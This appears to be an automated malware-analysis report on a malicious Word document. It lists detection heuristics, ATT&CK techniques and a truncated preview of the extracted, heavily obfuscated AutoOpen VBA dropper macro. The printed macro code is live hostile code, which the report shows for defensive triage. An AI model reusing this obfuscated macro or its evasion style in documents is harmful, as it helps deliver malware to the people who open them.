MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and uses 'CreateObject' to execute code, indicating a likely dropper functionality. The ClamAV signature 'Doc.Dropper.Agent-6463523-0' further confirms its malicious nature. The macro is heavily obfuscated, but its presence and the heuristic firings strongly suggest it is designed to download and execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6463523-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6463523-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78236 bytes |
SHA-256: 043d88080be73daf09dfaaad6e558451bbe685f62304b5cc30cd6d207ab8a8af |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 27 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "jVzsfqajoN" Function ijLJMqvBaFN() On Error Resume Next lAaiM = "iZWZjtvdjDXIzoZqIKfidiFwpPo" zIHbJjLcs = 1086028 / Atn(HcMwcwzl) / (4909611 - TKOsQmcNoZoBO / 1462971 - Sqr(OYYwiKZilpRf * CStr(OTpSzzvnw / Sgn(5869656 - CDate(5121448 / TGmjfGO * 933401 * Sqr(NZanrkt))))) + (dCzHEwVjVBQ - 2416226 / 9555933 / CLng(3541270))) iLvJGz = 8801376 / Atn(mPEmzFjDaMBtPf) / (1642277 - BHTbbEO / 1535000 - Sqr(wJEzsNvj * CStr(BcfHhXSvjr / Sgn(9510727 - CDate(5342517 / qsDLpzRW * 6460668 * Sqr(wVBwf))))) + (iwFNmd - 6256869 / 6468434 / CLng(8839306))) GzwuXFuVCi = ZGHSY + dd333h3sd(lAaiM, 8, 8) rMOlTsE = "zTNBLpJTRjzjMUPav%wWLSzI" PJAMtHCQGQS = 7316272 / Atn(SStSzGACmVBJ) / (5502537 - lLuCrBG / 7420743 - Sqr(SMawfA * CStr(bAtKAPWhEB / Sgn(4518091 - CDate(1203689 / OlsHojtkUck * 6148064 * Sqr(JaGYHUCKtAP))))) + (LWoMzqdz - 653096 / 8838604 / CLng(6258363))) Znvdtczu = 3782348 / Atn(KwGrGYIi) / (3973413 - vaftCD / 4801402 - Sqr(ldpdKEYW * CStr(HjcPumFwWvSn / Sgn(5523966 - CDate(1287551 / qQslSzbwiZvq * 5641570 * Sqr(nBTjnBwspBn))))) + (wjIGhIWCm - 8750490 / 2295820 / CLng(7359567))) qOIcfkiaITj = vJfYWKpcTL + dd333h3sd(rMOlTsE, 7, 3) zUiNnJsh = "FAmJctVfKCjP%!!%5rav%!!%4rav%hkU" MXDjcMPB = 6567879 / Atn(lqhhOSnXIjqa) / (8103990 - MiZDdwG / 6617076 - Sqr(vrBHoNbIsU * CStr(UloKGuzuM / Sgn(3432694 - CDate(210434 / EzwcQCwjiDQl * 8198569 * Sqr(KwJhawF))))) + (uauOzjBM - 4309077 / 1635650 / CLng(9009212))) nfAvWwozrIw = 458526 / Atn(KrkLGtkoRVDUtj) / (9642647 - iqCjkDWiCFPh / 4291357 - Sqr(HqoOAHYWUEU * CStr(cFrtDADbrRs / Sgn(3703548 - CDate(2421330 / VCIBiD * 3428501 * Sqr(NMjijqMIWzOF))))) + (QrIBPivoqz - 4036509 / 452435 / CLng(8682683))) nmPiiGlK = njkzq + dd333h3sd(zUiNnJsh, 4, 17) wRIjpdmNsS = "awnBaRSi4rav% tes&&!%szIHAhkAjntatEj" uLkoVTC = 6611379 / Atn(NEAlFzrjXJH) / (3221129 - jHfNC / 2531879 - Sqr(wtkBFr * CStr(HPzku / Sgn(1185716 - CDate(1707714 / EOMZAO * 8209515 * Sqr(wiZZinBQVRcmU))))) + (zjNtjRaY - 2636831 / 2035419 / CLng(8838733))) UHOdwrlUWGw = 4530915 / Atn(RAcMr) / (1164918 - lSfRZUNhPciWpk / 2861210 - Sqr(LGiZTZUPfGk * CStr(PsEkjUijAwT / Sgn(2999837 - CDate(597038 / JljXiSCUQFMjf * 2304089 * Sqr(QlTjiRWXtpUCij))))) + (nPWaQjiI - 4717981 / 3375483 / CLng(6412168))) FHPIuKzBwh = WNTaRNsriNYQ + dd333h3sd(wRIjpdmNsS, 16, 13) jPvMwJkuwsz = "StzQojkMwav% tesTWDrKbsQYwfVzKhVFFjDKP" sDUuJLChSU = 7282383 / Atn(ficQsPjzMdd) / (1644936 - QdWwsoYvU / 8488055 - Sqr(inzVArrMjMGU * CStr(ArBmtj / Sgn(4230492 - CDate(3528348 / GiwJZcGNlKqpmE * 3479237 * Sqr(wUmRcNK))))) + (PvBmlB - 7260451 / 4257569 / CLng(3950895))) Aqjdw = 6417008 / Atn(SZrSOFSaviR) / (2745226 - jbvOjBUtUoud / 5316274 - Sqr(bjYUUEXz * CStr(HCYLJnOdzhOD / Sgn(1892098 - CDate(1280835 / mTMnwlwom * 7345825 * Sqr(qXKwJOjqnMLpK))))) + (FKwwNP - 3398955 / 5611574 / CLng(287812))) UVFThhnaZEc = cwXApWijKAfZbm + dd333h3sd(jPvMwJkuwsz, 23, 7) XXKQHoC = "ESTXWquXjRlaAY2rav%!=%8rO" NkRNbBH = 4433109 / Atn(lDULabDfWW) / (5188812 - bRScNOzbsw / 8277281 - Sqr(tKVUdELj * CStr(dnGBAbRfqVi / Sgn(6123268 - CDate(8683915 / LXkowJ * 9182667 * Sqr(mMDSQGjCSLuv))))) + (dLaNmhvCdIlzBJ - 9356142 / 8513409 / CLng(3104094))) tvSODQVj = 2574958 / Atn(ksBuwhLLw) / (7763360 - XlzMi / 2252173 - Sqr(aLcziI * CStr(RSOwm / Sgn(1889648 - CDate(383934 / XLEbRcfaWzOalz * 431241 * Sqr(akipBukKspjP))))) + (OJiAZOmHGthvlF - 3971 / 3909615 / CLng(6545227))) aPCASPNF = BskAAKOlZSw + dd333h3sd(XXKQHoC, 2, 10) wrEzZvDrz = "dVrav%!!%7rav%!&&ll=DqKWFfHGXOdFtSRTiszvAvACThuRojYoVNO" twUpRKz = 9524994 / Atn(VJzNCMwjbEWYjw) / (4759713 - lJCWzP / 9768927 - Sqr(oCUdYlDPk * CStr(hKwLODKHzBfrwA / Sgn(993197 - CDate(7136980 / STbCGKi * 4807516 * Sqr(sUKqA))))) + (nkPOIa - 9196262 / 9741612 / CLng(2133261))) ZfISXDjr = 8069070 / Atn(zqzFTYnZ) / (7125061 - JwbzSmOLqwJAXD / 2335185 - Sqr(qckWVQM ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.